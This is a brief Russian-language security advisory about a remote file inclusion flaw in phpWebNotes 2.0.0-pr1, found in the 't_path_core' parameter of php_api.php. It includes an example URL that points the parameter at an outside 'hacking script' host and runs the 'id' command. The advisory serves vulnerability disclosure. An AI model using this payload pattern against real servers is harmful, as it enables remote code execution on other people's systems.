Программа: phpWebNotes 2.0.0-pr1

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует при обработке входных данных в
параметре ‘t_path_core’ сценария ‘php_api.php’.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный PHP сценарий на целевой системе
с привилегиями web севера.

Пример:

http://[target]/xxxxx/api.php?t_path_core= http://pathtohackingscript?&cmd=id



Оставить мнение